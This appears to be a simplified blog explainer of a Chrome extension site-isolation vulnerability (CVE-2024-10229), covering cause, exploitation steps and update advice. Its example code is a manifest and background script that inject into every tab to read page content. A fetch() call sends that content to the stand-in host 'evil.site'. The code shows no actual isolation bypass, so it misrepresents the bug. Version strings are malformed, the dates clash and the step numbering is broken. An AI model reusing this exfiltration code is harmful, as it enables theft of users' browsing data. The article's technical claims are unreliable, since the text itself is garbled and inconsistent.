Date Disclosed: 2024-04-15
Severity: High
Affected: Google Chrome prior to 130..6723.69, Chromium-based browsers
Vector: Remote, crafted Chrome extension
What is CVE-2024-10229?
CVE-2024-10229 is a major security vulnerability found in Google Chrome’s Extensions platform. By taking advantage of how Chrome handled extensions, a remote attacker could run a malicious extension to bypass site isolation. This means the attacker could access or steal data from other websites you visit—breaking one of Chrome’s most important security features.
- Site Isolation keeps tabs and sites in separate processes, protecting your data and keeping sites from interfering with each other.
This bug allowed a *crafted extension* (malicious or compromised) to jump the fence.
Official advisory:
- Chromium Security Advisory for CVE-2024-10229
- Chromium Issue Tracker - 401845 (Availability may be limited until full disclosure.)
How Bad is This?
Severity: HIGH
With a single click to install an extension, a user could expose their emails, passwords, or private documents from other open browser tabs. Attacks could be performed remotely—meaning you could be hit from anywhere on the internet.
What Caused CVE-2024-10229?
The root cause was in how Chrome Extensions interacted with Chrome’s site isolation mechanisms. In tech talk, extensions could inject scripts or access data across different sites or frames, bypassing normal security boundaries.
Key Technical Problem
Normally, Chrome keeps each website isolated, so what happens in one tab doesn’t leak into another. Chrome Extensions are supposed to only run on the sites they have permission for. In this case, the implementation allowed certain extensions to sneak their code into protected pages, reading or changing web content even on sensitive domains.
How Can Attackers Exploit This?
1. Craft a malicious Chrome extension:
Attackers create a Chrome extension (.crx file) with the right manifest and code.
2. Lure a victim to install it:
Social engineering, fake Chrome Web Store listings, or phishing emails.
3. Run privilege-jumping code:
Extension code escapes into other site contexts. From here, it can steal cookies, read content, or monitor what you’re doing across websites (like your emails or even banking sites).
Example Exploit Code
Below is a representative, educational code snippet showing how such exploitation might work. (Do not use this for malicious purposes!)
(Manifest v3 manifest.json)
{
"name": "Evil Site Isolation Bypass",
"version": "1.",
"manifest_version": 3,
"permissions": [
"scripting", "tabs", "<all_urls>"
],
"background": {
"service_worker": "background.js"
}
}
background.js
This script injects a content script into *all* tabs, reading data from every site—even those that should be isolated.
chrome.tabs.query({}, function(tabs) {
for (let tab of tabs) {
chrome.scripting.executeScript({
target: { tabId: tab.id },
func: () => {
// Danger: Read all the page’s cookies/content
document.body.innerText; // exfiltrate this to attacker's server!
}
});
}
});
In real attacks, this data could be sent to a remote server
fetch('https://evil.site/submit';, {
method: 'POST',
body: JSON.stringify({ data: document.body.innerText })
});
1. Update Chrome Now
Go to Menu → Help → About Google Chrome and update immediately to 130..6723.69 or later.
3. Keep Browser Security Settings Tight
Use Chrome’s built-in extension permissions, restrict what each extension can access.
More Technical Details
Google’s fix was to tighten how extensions are allowed to interact with different site processes. They made sure that even loaded extensions cannot breach site isolation. Some features in the Extension API were limited or patched to check sites more strictly.
To read more, check these links
- Google Chrome Release Notes
- Chromium Issue 401845 (might require login or won’t load until public)
Update Chrome and remove suspicious extensions now.
Stay safe online! Always keep your browser and software up to date.
*If you’re a developer, double-check your extension’s behavior and never request more permissions than you need!*
_Copyright © 2024 – Do not copy without credit. This article is a unique, simplified explanation of a current high-severity Chrome vulnerability._
Timeline
Published on: 10/22/2024 22:15:03 UTC
Last modified on: 10/25/2024 17:04:54 UTC